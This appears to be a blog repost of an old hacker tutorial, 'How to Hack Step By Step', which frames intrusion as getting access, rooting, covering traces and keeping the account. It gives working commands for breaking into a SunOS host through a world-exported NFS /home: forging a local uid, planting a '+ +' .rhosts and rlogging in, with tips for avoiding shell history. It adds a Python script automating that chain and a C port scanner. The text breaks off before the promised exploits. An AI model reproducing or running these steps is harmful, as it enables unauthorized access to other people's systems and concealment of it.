Tuesday, 19 April 2011

How to Hack Step By Step

Howdy folks... I guess you are all wondering who this guy (me) is that's trying to show you a bit of everything. Well, I ain't telling you anything about that. Copyright and other stuff like this (below). If you feel offended by this subject (hacking), or you think you could do better, don't read the information below. This file is for educational purposes ONLY. ;) I ain't responsible for any damage you do after reading this (I'm very serious). It can be copied, but not modified (send me the changes, and if they are good, I'll include them). Don't read it, 'cuz it might be illegal. I warned you... If you would like to continue, press .

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactly for beginners, but it'll have to do. What every hacker has to know is that there are 4 steps in hacking:

Step 1: Getting access to the site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

OK. In the next pages we'll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site. I'll try to explain the most used ones. The first thing I do is check whether the system has an NFS export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one (the server isn't running mountd, so there is nothing exported to ask about), it's time to search for another way in. What I was trying to do was exploit an old problem with most SunOS boxes: if the site exports its home directories over NFS to everyone, a remote attacker can mount them, drop a .rhosts file into a user's home directory and then rlogin as that user without a password. Let's see what happens on a site that does export /home:
mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr     victim2.site.com
/home    (everyone)
/cdrom   (everyone)

/home is exported to everyone, so any host on the net can mount it:

mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
   1 drwxrwxr-x    8 root      root          1024 Jul  4 20:34 ./
   1 drwxr-xr-x   19 root      root          1024 Oct  8 13:42 ../
   1 drwxr-xr-x    3 at1       users         1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x    8 ftp       wheel         1024 Jul 12 14:20 ftp/
   1 drwxr-xr-x    3 john      100           1024 Jul  6 13:42 john/
   1 drwxr-xr-x    3 139       100           1024 Sep 15 12:24 paul/
   1 -rw-------    1 root      root           242 Mar  9  1997 sudoers
   1 drwx------    3 test      100           1024 Oct  8 21:05 test/
   1 drwx------   15 102       100           1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home. The directory is mode 700 and owned by uid 102 (shown numerically because no user on our box has that uid), and an NFS server normally maps the client's root to nobody, so being root on mysite doesn't let us write there. But the server believes whatever uid the client sends, so all we need is a local account with uid 102:

mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (damn!) .bash_history, and since this account's home is the mounted /home, that file would end up on the remote server where you might forget it...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
   1 drwxrwxr-x    8 root      root          1024 Jul  4 20:34 ./
   1 drwxr-xr-x   19 root      root          1024 Oct  8 13:42 ../
   1 drwxr-xr-x    3 at1       users         1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x    8 ftp       wheel         1024 Jul 12 14:20 ftp/
   1 drwxr-xr-x    3 john      100           1024 Jul  6 13:42 john/
   1 drwxr-xr-x    3 139       100           1024 Sep 15 12:24 paul/
   1 -rw-------    1 root      root           242 Mar  9  1997 sudoers
   1 drwx------    3 test      100           1024 Oct  8 21:05 test/
   1 drwx------   15 rapper    daemon        1024 Oct 20 18:57 rapper/

So we own this guy's home directory. "su -" dropped us into the account's home, /tmp/mount, so the next command writes victim1's /home/rapper/.rhosts. The "+ +" entry means any user from any host may rlogin as rapper with no password:

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com. SunOs ver....(crap).
victim1:~$

rlogin sends our local username (rapper), the victim's rlogind finds the "+ +" in ~rapper/.rhosts, and we're in. This is the first method...
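To make the chain above checkable without a victim, here is an added example (my code, not part of the original text) that breaks Step 1 into pieces: it parses constructed showmount and ls output, picks out world-mountable exports, builds the local passwd entry with the matching uid, and evaluates what a .rhosts file grants. The hostnames, users, sample output and the mount point are constructed, and the .rhosts parser covers only the common line forms.

```python
"""Added example, not part of the original text: the Step 1 NFS chain
(showmount -> mount -> matching uid -> .rhosts -> rlogin) as checkable
pieces.  All sample output, hosts and users below are constructed."""
from typing import Dict, List, Optional, Tuple

# Constructed `showmount -e` output, in the layout the text shows.
SAMPLE_EXPORTS = """\
Export list for victim1.site.com:
/usr   victim2.site.com
/home  (everyone)
/cdrom (everyone)
"""

# Constructed `ls -ln /tmp/mount` output: numeric ids, because the
# server's users have no names on the attacker's box.
SAMPLE_LS = """\
drwxr-xr-x    3 1001  100  1024 Jun 22 19:18 at1
dr-xr-xr-x    8 14    10   1024 Jul 12 14:20 ftp
drwx------   15 102   100  1024 Oct 20 18:57 rapper
"""


def parse_exports(text: str) -> Dict[str, List[str]]:
    """Map each exported path to its client list, skipping the header line."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if line.startswith("/"):
            path, *clients = line.split()
            exports[path] = clients
    return exports


def world_mountable(exports: Dict[str, List[str]]) -> List[str]:
    """Paths any host may mount: showmount prints '(everyone)' (some
    servers print '*') when the export has no client restriction."""
    return sorted(p for p, cl in exports.items()
                  if any(c in ("(everyone)", "*") for c in cl))


def owner_ids(ls_text: str, name: str) -> Tuple[int, int]:
    """(uid, gid) of entry `name` in `ls -ln` output."""
    for line in ls_text.splitlines():
        f = line.split()
        if len(f) >= 9 and f[-1] == name:
            return int(f[2]), int(f[3])
    raise KeyError(name)


def passwd_line(user: str, uid: int, gid: int, home: str,
                shell: str = "/bin/csh") -> str:
    """Local /etc/passwd entry that impersonates the remote owner.

    With AUTH_SYS the server trusts whatever uid/gid the client sends, but
    it maps the client's root to nobody, so a real local uid equal to the
    remote one is needed.  The password field is '*' (root's `su -` asks
    for none).  csh is used so no .bash_history lands in `home`, which is
    the victim's mounted /home."""
    return f"{user}:*:{uid}:{gid}::{home}:{shell}"


def rhosts_permits(rhosts: str, account: str, client_host: str,
                   client_user: str) -> bool:
    """Would this ~account/.rhosts let client_user@client_host rlogin as
    `account` with no password?  Lines are 'host [user]'; '+' matches
    anything; a bare host means the same login name; a leading '-' on the
    host denies that host.  Only these common forms are handled."""
    for line in rhosts.splitlines():
        f = line.split()
        if not f or f[0].startswith("#"):
            continue
        deny = f[0].startswith("-")
        host = f[0].lstrip("-")
        wanted_user = f[1] if len(f) > 1 else account
        if host not in ("+", client_host):
            continue
        if wanted_user not in ("+", client_user):
            continue
        return not deny
    return False


def plan(exports_text: str, ls_text: str, target: str, server: str,
         mount_point: str = "/tmp/mount") -> Optional[Dict[str, str]]:
    """Tie the pieces together; None when /home is not world-mountable."""
    if "/home" not in world_mountable(parse_exports(exports_text)):
        return None
    uid, gid = owner_ids(ls_text, target)
    return {
        "mount": f"mount -nt nfs {server}:/home {mount_point}",
        "passwd": passwd_line(target, uid, gid, mount_point),
        "rhosts": "+ +\n",
    }


if __name__ == "__main__":
    p = plan(SAMPLE_EXPORTS, SAMPLE_LS, "rapper", "victim1.site.com")
    for k, v in p.items():
        print(f"{k:7}: {v.strip()}")
    print("root@mysite may rlogin as rapper:",
          rhosts_permits(p["rhosts"], "rapper", "mysite", "root"))
```

The same functions work on the defender's side: run `showmount -e` against your own servers and any path `world_mountable` returns that holds home directories is exactly the hole used here, and `rhosts_permits` with a "+" host is the pattern to grep for in users' .rhosts files.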
Another method is to check whether the site has port 80 open. That means it runs a web server (and that's very bad for them, 'cuz web servers are usually vulnerable). Below I include the source of a scanner that helped me before NMAP was written. (Go get it at http://www.dhp.com/~fyodor . Good job, Fyodor.) NMAP is a scanner that even does stealth scanning, so lots of systems won't record it. The scanner below, by contrast, does a full connect() to every port, so each hit completes the TCP handshake and shows up in the target's logs (inetd, tcp_wrappers, the daemon itself).

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <ctype.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    struct hostent *host;
    int err, i, net;
    struct sockaddr_in sa;

    if (argc != 2) {
        printf("Usage: %s hostname\n", argv[0]);
        exit(1);
    }

    /* Resolve the target once, not once per port. */
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit((unsigned char)*argv[1]))
        sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != NULL)
        /* memcpy, not strncpy: an address with a zero octet (10.0.x.x)
           would be cut short by a string copy. */
        memcpy(&sa.sin_addr, host->h_addr_list[0], sizeof sa.sin_addr);
    else {
        herror(argv[1]);
        exit(2);
    }

    /* Full TCP connect() to every privileged port. */
    for (i = 1; i < 1024; i++) {
        sa.sin_port = htons(i);
        net = socket(AF_INET, SOCK_STREAM, 0);
        if (net < 0) {
            perror("\nsocket");
            exit(2);
        }
        err = connect(net, (struct sockaddr *) &sa, sizeof sa);
        if (err < 0) {
            /* Closed or filtered: overwrite the status line and move on. */
            printf("%s %-5d %s\r", argv[1], i, strerror(errno));
            fflush(stdout);
        } else {
            printf("%s %-5d accepted.                                \n", argv[1], i);
            if (shutdown(net, 2) < 0) {
                perror("\nshutdown");
                exit(2);
            }
        }
        close(net);
    }
    printf("                                                                  \r");
    fflush(stdout);
    return 0;
}

Well, now be very careful with the exploits below, because they usually get logged. Besides,
